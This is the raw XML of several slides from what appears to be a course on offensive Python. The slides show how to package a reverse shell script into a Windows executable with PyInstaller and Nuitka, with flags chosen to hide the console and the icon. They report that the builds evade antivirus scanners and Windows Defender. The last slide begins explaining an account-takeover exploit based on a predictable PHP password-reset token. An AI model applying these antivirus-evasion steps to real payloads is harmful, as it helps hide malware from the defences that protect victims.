                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72FC0E36-320D-4954-8C06-DECC0D3F81EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1716508" y="3979025"/>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C:\Users\user\Downloads\pyinstaller-4.7\bootloader&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>python .\setup.py install</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1694C89F-AC1D-4EFF-8A90-39911A99FAFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987540" y="4526205"/>
            <a:ext cx="7542849" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyInstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> should be ready</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE1A789-10DE-431B-9A3A-A0DF4D561B53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1716508" y="5073899"/>
            <a:ext cx="982177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C:\Users\joe\Downloads\pyinstaller-4.7&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pyinstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4.7</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274638726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err="1"/>
              <a:t>Pyinstaller</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165</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write our simple PoC reverse shell and try to convert it to an EXE file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA6AD47-F9EB-4404-8B4D-BB5762C1F420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1519992" y="2418872"/>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PS C:\Users\user\Desktop\myscript&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pyinstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>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onefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --windowed --icon NONE .\myscript.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A13B59-234A-4775-82BA-39EC73648238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1519992" y="2978919"/>
            <a:ext cx="9556133" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” output should be a one EXE file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“--windowed” no console will be prompted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“--icon NONE” no icon will be associated with the output file.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{984EEFF7-9A91-4EFB-9DAA-E4BCBF85D4D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987540" y="40045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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyInstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> finishes, an output file will be placed under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>dist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/myscript.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E07051AF-00C0-4672-BB99-571428B48A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773" y="4512958"/>
            <a:ext cx="10458450" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29253217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err="1"/>
              <a:t>Pyinstaller</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166</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9556133"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run the generated executable, we get a reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface, text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EB1BF9D-8A92-48A2-B644-62CF60C31D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297" y="2382253"/>
            <a:ext cx="7640555" cy="3712575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73810334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err="1"/>
              <a:t>Pyinstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>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167</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4795639" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we scan the executable using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>antiscan.me</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Nice! Not a single AV has detected our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>myscript.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</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A48F8089-BEE0-4870-8B77-808ECE76E8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781" y="819944"/>
            <a:ext cx="4362336" cy="5941803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25830649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Nuitka</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168</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5465397" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Nuitka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is yet another tool to compile Python files.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can install Nuitka through pip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27CA7C6D-9387-4CE8-B50E-34FF015F42E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1542049" y="2900135"/>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accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pip install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nuitka</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90BB9391-2D21-4B53-B1FB-53536E98B34A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987539" y="3370666"/>
            <a:ext cx="7598997"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we’ll have to compile our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>myscript.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reverse shell PoC.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BAEF240-7534-4E9F-89C2-64681E09B8AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1542048" y="3918285"/>
            <a:ext cx="10132593"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accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nuitka.bat --mingw64 --standalone --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --windows-disable-console -o myscript.exe .\myscript.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65BE277-D56C-469D-94F9-14197DD7C64C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1542048" y="4333396"/>
            <a:ext cx="9556133" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“--mingw64” specify the compiler to be mingw64.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“--standalone” output binary should be standalone.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” output file should be self-contained.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“--windows-disable-console” disable window console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“-o” specify output file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47DE77B9-E338-41D0-9513-723393D9CC72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987539" y="6075143"/>
            <a:ext cx="7903798" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nuitka might ask to download few dependencies such as mingw64 compiler.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> You can accept to download all dependencies that it needs once prompted.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9994484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462461" y="186226"/>
            <a:ext cx="6344654" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>AV evasion with Python (cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0"/>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Nuitka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169</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9584309B-9F2F-46C4-A68A-9E5C8FE2C9CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987540" y="1870923"/>
            <a:ext cx="5465397"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Nuitka finishes, the output file will look like:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8369609F-B91E-4478-BA4D-19CC5421B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256" y="2383757"/>
            <a:ext cx="8372475" cy="895350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F9CB3C-103F-40C1-9965-804FB0053E63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987540" y="3643576"/>
            <a:ext cx="9780723" cy="2120068"/>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dirty="0"/>
              <a:t>You can see that the file is relatively larger than those produced by py2exe and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pyinstaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we run this binary, we get a reverse shell back.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unfortunately, the binary is large enough that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>antiscan.me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> does not accept it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, the binary does not get flagged as of this writing on a fully updated Win10 machine with Windows Defender turned on.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34520914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Writing basic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PCPAPP contained a vulnerability that was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>reported</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> a few months ago.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The problem was essentially in the “password reset” mechanism, which results into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Account Takeover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Graphical user interface, text, application, Word&#10;&#10;Description automatically generated with medium confidence">
            <a:hlinkClick r:id="rId4"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D03ABF5E-F80C-4796-95F5-2B5CAB2959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0874" y="2415377"/>
            <a:ext cx="8398042" cy="2688262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04739D4E-BF20-4B01-A36B-5E4157866C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1232343" y="5103639"/>
            <a:ext cx="10555705" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The password reset token is calculated in such a way that it can be calculated by the attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function in PHP returns the current number of seconds since Unix Epoch (January 1 1970 00:00:00 GMT).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
